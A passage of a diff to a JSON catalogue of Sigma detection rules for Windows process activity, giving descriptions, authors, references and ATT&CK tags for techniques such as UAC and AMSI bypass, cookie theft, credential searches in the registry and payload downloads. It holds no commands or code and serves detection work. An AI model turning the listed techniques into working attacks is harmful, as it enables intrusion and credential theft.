Unlikely" + ], + "filename": "proc_creation_win_susp_winrm_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://redcanary.com/blog/lateral-movement-winrm-wmi/", + "https://twitter.com/bohops/status/994405551751815170", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_winrm_execution.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "9df0dd3a-1a5c-47e3-a2bc-30ed177646a0", + "value": "Remote Code Execute via Winrm.vbs" + }, + { + "description": "Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc).\nMight be used by ransomwares during the attack (seen by NotPetya and others).\n", + "meta": { + "author": "Ecco, E.M. Anhaus, oscd.community", + "creation_date": "2019/09/26", + "falsepositive": [ + "Admin activity", + "Scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_fsutil_usage.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070/T1070.md", + "https://eqllib.readthedocs.io/en/latest/analytics/c91f422a-5214-4b17-8664-c5fcf115c0a2.html", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/fsutil-usn", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_fsutil_usage.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1070" + ] + }, + "uuid": "add64136-62e5-48ea-807e-88638d02df1e", + "value": "Fsutil Suspicious Invocation" + }, + { + "description": "Detects a suspicious copy command to or from an Admin share or remote", + "meta": { + "author": "Florian Roth, oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, 
Nasreddine Bencherchali", + "creation_date": "2019/12/30", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "proc_creation_win_susp_copy_lateral_movement.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/SBousseaden/status/1211636381086339073", + "https://www.elastic.co/guide/en/security/current/remote-file-copy-to-a-hidden-share.html", + "https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/", + "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_copy_lateral_movement.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.collection", + "attack.exfiltration", + "attack.t1039", + "attack.t1048", + "attack.t1021.002" + ] + }, + "uuid": "855bc8b5-2ae8-402e-a9ed-b889e6df1900", + "value": "Copy from Admin Share" + }, + { + "description": "Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/09/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_icmluautil.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "49f2f17b-b4c8-4172-a68b-d5bf95d05130", + "value": "UAC Bypass via ICMLuaUtil" + }, + { + "description": "Detects the use of SharpEvtHook, a tool to tamper with Windows event logs", + "meta": { + "author": "Florian Roth", + "creation_date": 
"2022/09/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_sysmon_disable_sharpevtmute.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/bats3c/EvtMute", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysmon_disable_sharpevtmute.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.002" + ] + }, + "uuid": "bedfc8ad-d1c7-4e37-a20e-e2b0dbee759c", + "value": "SharpEvtMute EvtMuteHook Load" + }, + { + "description": "Detects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", + "meta": { + "author": "Sai Prashanth Pulisetti @pulisettis", + "creation_date": "2022/12/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_impersonate_tool.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/sensepost/impersonate", + "https://sensepost.com/blog/2022/abusing-windows-tokens-to-compromise-active-directory-without-touching-lsass/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_impersonate_tool.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.defense_evasion", + "attack.t1134.001", + "attack.t1134.003" + ] + }, + "uuid": "cf0c254b-22f1-4b2b-8221-e137b3c0af94", + "value": "Impersonate Execution" + }, + { + "description": "Detects usage of the \"Set-Service\" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as \"sc.exe\", \"Get-Service\"...etc. 
(Works only in powershell 7)",
+ "meta": {
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/10/17",
+ "falsepositive": [
+ "Rare intended use of hidden services"
+ ],
+ "filename": "proc_creation_win_using_set_service_to_hide_services.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.management/set-service?view=powershell-7.2",
+ "https://twitter.com/Alh4zr3d/status/1580925761996828672",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_using_set_service_to_hide_services.yml"
+ ],
+ "tags": [
+ "attack.persistence",
+ "attack.defense_evasion",
+ "attack.privilege_escalation",
+ "attack.t1574.011"
+ ]
+ },
+ "uuid": "514e4c3a-c77d-4cde-a00f-046425e2301e",
+ "value": "Abuse of Service Permissions to Hide Services Via Set-Service"
+ },
+ {
+ "description": "This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,\nUsee to Query/modify DNS records for Active Directory integrated DNS via LDAP\n",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/01/01",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_susp_adidnsdump.yml",
+ "level": "low",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adidnsdump.yml"
+ ],
+ "tags": [
+ "attack.discovery",
+ "attack.t1018"
+ ]
+ },
+ "uuid": "26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160",
+ "value": "Suspicious Execution of Adidnsdump"
+ },
+ {
+ "description": "Detects the use of the Dinject 
PowerShell cradle based on the specific flags",
+ "meta": {
+ "author": "Florian Roth",
+ "creation_date": "2021/12/07",
+ "falsepositive": [
+ "Unlikely"
+ ],
+ "filename": "proc_creation_win_dinjector.yml",
+ "level": "critical",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/snovvcrash/DInjector",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dinjector.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1055"
+ ]
+ },
+ "uuid": "d78b5d61-187d-44b6-bf02-93486a80de5a",
+ "value": "DInject PowerShell Cradle CommandLine Flags"
+ },
+ {
+ "description": "HxTsr.exe is a Microsoft compressed executable file called Microsoft Outlook Communications.HxTsr.exe is part of Outlook apps, because it resides in a hidden \"WindowsApps\" subfolder of \"C:\\Program Files\". Its path includes a version number, e.g., \"C:\\Program Files\\WindowsApps\\microsoft.windowscommunicationsapps_17.7466.41167.0_x64__8wekyb3d8bbwe\\HxTsr.exe\". Any instances of hxtsr.exe not in this folder may be malware camouflaging itself as HxTsr.exe",
+ "meta": {
+ "author": "Sreeman",
+ "creation_date": "2020/04/17",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_detecting_fake_instances_of_hxtsr.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_detecting_fake_instances_of_hxtsr.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1036"
+ ]
+ },
+ "uuid": "4e762605-34a8-406d-b72e-c1a089313320",
+ "value": "Detecting Fake Instances Of Hxtsr.exe"
+ },
+ {
+ "description": "Detect use of the Windows 8.3 short name. 
Which could be used as a method to avoid Image based detection",
+ "meta": {
+ "author": "frack113, Nasreddine Bencherchali",
+ "creation_date": "2022/08/06",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_ntfs_short_name_use_image.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-2000-server/cc959352(v=technet.10)?redirectedfrom=MSDN",
+ "https://www.acunetix.com/blog/articles/windows-short-8-3-filenames-web-security-problem/",
+ "https://twitter.com/jonasLyk/status/1555914501802921984",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ntfs_short_name_use_image.yml"
+ ],
+ "tags": [
+ "attack.defense_evasion",
+ "attack.t1564.004"
+ ]
+ },
+ "uuid": "3ef5605c-9eb9-47b0-9a71-b727e6aa5c3b",
+ "value": "Use NTFS Short Name in Image"
+ },
+ {
+ "description": "Detects the execution of a renamed PowerShell often used by attackers or malware",
+ "meta": {
+ "author": "Florian Roth, frack113",
+ "creation_date": "2019/08/22",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_renamed_powershell.yml",
+ "level": "high",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://twitter.com/christophetd/status/1164506034720952320",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_powershell.yml"
+ ],
+ "tags": [
+ "car.2013-05-009",
+ "attack.defense_evasion",
+ "attack.t1036.003"
+ ]
+ },
+ "uuid": "d178a2d7-129a-4ba4-8ee6-d6e1fecd5d20",
+ "value": "Renamed PowerShell"
+ },
+ {
+ "description": "Detect use of sqlite binary to query the Firefox cookies.sqlite database and steal the cookie data contained within it",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2022/04/08",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": 
"proc_creation_win_sqlite_firefox_cookies.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlite_firefox_cookies.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1539" + ] + }, + "uuid": "4833155a-4053-4c9c-a997-777fcea0baa7", + "value": "SQLite Firefox Cookie DB Access" + }, + { + "description": "Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/10/26", + "falsepositive": [ + "Google Drive", + "Citrix" + ], + "filename": "proc_creation_win_commandline_path_traversal_evasion.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/hexacorn/status/1448037865435320323", + "https://twitter.com/Gal_B1t/status/1062971006078345217", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_commandline_path_traversal_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036" + ] + }, + "uuid": "1327381e-6ab0-4f38-b583-4c1b8346a56b", + "value": "Command Line Path Traversal Evasion" + }, + { + "description": "Detects a whoami.exe executed by LOCAL SYSTEM. 
This may be a sign of a successful local privilege escalation.",
+ "meta": {
+ "author": "Teymur Kheirkhabarov, Florian Roth",
+ "creation_date": "2019/10/23",
+ "falsepositive": [
+ "Possible name overlap with NT AUHTORITY substring to cover all languages"
+ ],
+ "filename": "proc_creation_win_whoami_as_system.yml",
 "level": "high",
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
 "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment",
- "https://pentestlab.blog/2017/03/31/insecure-registry-permissions/",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_possible_privilege_escalation_via_service_reg_perm.yml"
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_as_system.yml"
 ],
 "tags": [
 "attack.privilege_escalation",
- "attack.t1574.011"
+ "attack.discovery",
+ "attack.t1033"
 ]
 },
- "uuid": "0f9c21f1-6a73-4b0e-9809-cb562cb8d981",
- "value": "Possible Privilege Escalation via Service Permissions Weakness"
+ "uuid": "80167ada-7a12-41ed-b8e9-aa47195c66a1",
+ "value": "Run Whoami as SYSTEM"
 },
 {
- "description": "Detects Request to amsiInitFailed that can be used to disable AMSI Scanning",
+ "description": "Detects actions that clear the local ShimCache and remove forensic evidence",
 "meta": {
- "author": "Markus Neis",
- "creation_date": "2018/08/17",
+ "author": "Florian Roth",
+ "creation_date": "2021/02/01",
 "falsepositive": [
- "Unlikely"
+ "Unknown"
 ],
- "filename": "proc_creation_win_powershell_amsi_bypass.yml",
+ "filename": "proc_creation_win_susp_shimcache_flush.yml",
 "level": "high",
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://twitter.com/mattifestation/status/735261176745988096",
- "https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120",
-
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_amsi_bypass.yml" + "https://medium.com/@blueteamops/shimcache-flush-89daff28d15e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_shimcache_flush.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1562.001" + "attack.t1112" ] }, - "uuid": "30edb182-aa75-42c0-b0a9-e998bb29067c", - "value": "Powershell AMSI Bypass via .NET Reflection" + "uuid": "b0524451-19af-4efa-a46f-562a977f792e", + "value": "ShimCache Flush" }, { - "description": "Detects audio capture via PowerShell Cmdlet.", + "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", "meta": { - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "creation_date": "2019/10/24", + "author": "frack113", + "creation_date": "2021/07/13", "falsepositive": [ - "Legitimate audio capture by legitimate user." 
+ "Unknown" ], - "filename": "proc_creation_win_powershell_audio_capture.yml", + "filename": "proc_creation_win_infdefaultinstall.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", - "https://eqllib.readthedocs.io/en/latest/analytics/ab7a6ef4-0983-4275-a4f1-5c6bd3c31c23.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_audio_capture.yml" + "https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_infdefaultinstall.yml" ], "tags": [ - "attack.collection", - "attack.t1123" + "attack.defense_evasion", + "attack.t1218" ] }, - "uuid": "932fb0d8-692b-4b0f-a26e-5643a50fe7d6", - "value": "Audio Capture via PowerShell" + "uuid": "ce7cf472-6fcc-490a-9481-3786840b5d9b", + "value": "InfDefaultInstall.exe .inf Execution" + }, + { + "description": "Detects Cobalt Strike module/commands accidentally entered in CMD shell", + "meta": { + "author": "_pete_0, TheDFIRReport", + "creation_date": "2022/05/06", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_cobaltstrike_bloopers_modules.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf", + "https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/", + "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cobaltstrike_bloopers_modules.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.003" + ] + }, + "uuid": "4f154fb6-27d1-4813-a759-78b93e0b9c48", + "value": "Operator Bloopers Cobalt Strike Modules" + }, + { + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_cl_invocation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/bohops/status/948061991012327424", + "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "a0459f02-ac51-4c09-b511-b8c9203fc429", + "value": "Execution via CL_Invocation.ps1" + }, + { + "description": "Detects suspicious command line flags that let the user set a target user and command as e.g. seen in PsExec-like tools", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/11/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_command_flag_pattern.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.trendmicro.com/en_us/research/22/k/hack-the-real-box-apt41-new-subgroup-earth-longzhi.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_command_flag_pattern.yml" + ], + "tags": "No established tags" + }, + "uuid": "50d66fb0-03f8-4da0-8add-84e77d12a020", + "value": "Suspicious RunAs-Like Flag Combination" }, { "description": "Detects Base64 encoded Shellcode", 
@@ -44263,242 +40671,879 @@
 "value": "PowerShell Base64 Encoded Shellcode"
 },
 {
- "description": "Detects specific encoding method of cOnvErTTO-SECUreStRIng in the PowerShell command lines",
+ "description": "Detects execution of the IEExec utility to download payloads",
 "meta": {
- "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton",
- "creation_date": "2020/10/11",
+ "author": "Nasreddine Bencherchali",
+ "creation_date": "2022/05/16",
 "falsepositive": [
- "Unlikely"
+ "Unknown"
 ],
- "filename": "proc_creation_win_powershell_cmdline_convertto_securestring.yml",
+ "filename": "proc_creation_win_lolbin_ieexec_download.yml",
 "level": "high",
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml"
+ "https://lolbas-project.github.io/lolbas/Binaries/Ieexec/",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml"
 ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1027",
- "attack.execution",
- "attack.t1059.001"
- ]
+ "tags": "No established tags"
 },
- "uuid": "74403157-20f5-415d-89a7-c505779585cf",
- "value": "Encoded PowerShell Command Line Usage of ConvertTo-SecureString"
+ "uuid": "9801abb8-e297-4dbf-9fbd-57dde0e830ad",
+ "value": "Abusing IEExec To Download Payloads"
 },
 {
- "description": "Detects the PowerShell command lines with reversed strings",
+ "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines",
 "meta": {
- "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton",
- "creation_date": "2020/10/11",
+ "author": "Florian Roth",
+ "creation_date": "2022/07/11",
 "falsepositive": [
- "Unlikely"
+
"Unknown" ], - "filename": "proc_creation_win_powershell_cmdline_reversed_strings.yml", + "filename": "proc_creation_win_susp_ps_encoded_obfusc.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/", - "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml" + "https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_encoded_obfusc.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "value": "Suspicious PowerShell Obfuscated PowerShell Code" + }, + { + "description": "Detects automated lateral movement by Turla group", + "meta": { + "author": "Markus Neis", + "creation_date": "2017/11/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_turla_commands_medium.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/the-epic-turla-operation/65545/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_turla_commands_medium.yml" + ], + "tags": [ + "attack.g0010", + "attack.execution", + "attack.t1059", + "attack.lateral_movement", + "attack.t1021.002", + "attack.discovery", + "attack.t1083", + "attack.t1135" + ] + }, + "uuid": "75925535-ca97-4e0a-a850-00b5c00779dc", + "value": "Automated Turla Group Lateral Movement" + }, + { + "description": "Detects execution from an Alternate Data Stream (ADS). 
Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection",
+ "meta": {
+ "author": "frack113",
+ "creation_date": "2021/09/01",
+ "falsepositive": [
+ "Unknown"
+ ],
+ "filename": "proc_creation_win_alternate_data_streams.yml",
+ "level": "medium",
+ "logsource.category": "process_creation",
+ "logsource.product": "windows",
+ "refs": [
+ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md",
+ "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_alternate_data_streams.yml"
 ],
 "tags": [
 "attack.defense_evasion",
- "attack.t1027",
- "attack.execution",
- "attack.t1059.001"
+ "attack.t1564.004"
 ]
 },
- "uuid": "b6b49cd1-34d6-4ead-b1bf-176e9edba9a4",
- "value": "Suspicious PowerShell Cmdline"
+ "uuid": "7f43c430-5001-4f8b-aaa9-c3b88f18fa5c",
+ "value": "Execute From Alternate Data Streams"
 },
 {
- "description": "Detects the PowerShell command lines with special characters",
+ "description": "Detects the execution of rundll32.exe that has been renamed to a different name to avoid detection",
 "meta": {
- "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp)",
- "creation_date": "2020/10/15",
+ "author": "Florian Roth",
+ "creation_date": "2022/06/08",
 "falsepositive": [
- "Unlikely",
- "Amazon SSM Document Worker",
- "Windows Defender ATP"
+ "Unknown"
 ],
- "filename": "proc_creation_win_powershell_cmdline_special_characters.yml",
+ "filename": "proc_creation_win_renamed_rundll32.yml",
 "level": "high",
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml"
+ "https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/",
+
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_rundll32.yml" + ], + "tags": "No established tags" + }, + "uuid": "d4d2574f-ac17-4d9e-b986-aeeae0dc8fe2", + "value": "Renamed Rundll32.exe Execution" + }, + { + "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "meta": { + "author": "frack113", + "creation_date": "2022/08/19", + "falsepositive": [ + "Legitimate use" + ], + "filename": "proc_creation_win_modify_group_policy_settings.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1484.001/T1484.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_modify_group_policy_settings.yml" ], "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "attack.t1484.001" ] }, - "uuid": "d7bcd677-645d-4691-a8d4-7a5602b780d1", - "value": "Suspicious PowerShell Command Line" + "uuid": "ada4b0c4-758b-46ac-9033-9004613a150d", + "value": "Modify Group Policy Settings" }, { - "description": "Detects specific combinations of encoding methods in the PowerShell command lines", + "description": "Detects processes leveraging the \"ms-msdt\" handler or the \"msdt.exe\" binary to execute arbitrary commands as seen in the follina (CVE-2022-30190) vulnerability", "meta": { - "author": "Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton", - "creation_date": "2020/10/11", + "author": "Nasreddine Bencherchali (rule)", + "creation_date": "2022/05/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_msdt.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://twitter.com/_JohnHammond/status/1531672601067675648", + "https://twitter.com/nao_sec/status/1530196847679401984", + "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msdt.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "258fc8ce-8352-443a-9120-8a11e4857fa5", + "value": "Execute Arbitrary Commands Using MSDT.EXE" + }, + { + "description": "Adversaries may search the Registry on compromised systems for insecurely stored credentials.\nThe Windows Registry stores configuration information that can be used by the system or other programs.\nAdversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_enumeration_for_credentials_in_registry.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.002/T1552.002.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_enumeration_for_credentials_in_registry.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.002" + ] + }, + "uuid": "e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1", + "value": "Enumeration for Credentials in Registry" + }, + { + "description": "Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.", + "meta": { + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "creation_date": "2020/10/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml", + "level": "medium", + "logsource.category": "process_creation", + 
"logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", + "value": "Custom Class Execution via Xwizard" + }, + { + "description": "Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/03/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_apt_hafnium.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/BleepinComputer/status/1372218235949617161", + "https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/", + "https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/", + "https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3", + "https://twitter.com/GadixCRK/status/1369313704869834753?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_apt_hafnium.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546", + "attack.t1053" + ] + }, + "uuid": "bbb2dedd-a0e3-46ab-ba6c-6c82ae7a9aa7", + "value": "Exchange Exploitation Activity" + }, + { + "description": "Detects a specific PowerShell command line pattern used by the UNC2452 actors as mentioned in Microsoft and Symantec reports", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/01/20", "falsepositive": [ "Unlikely" ], - "filename": 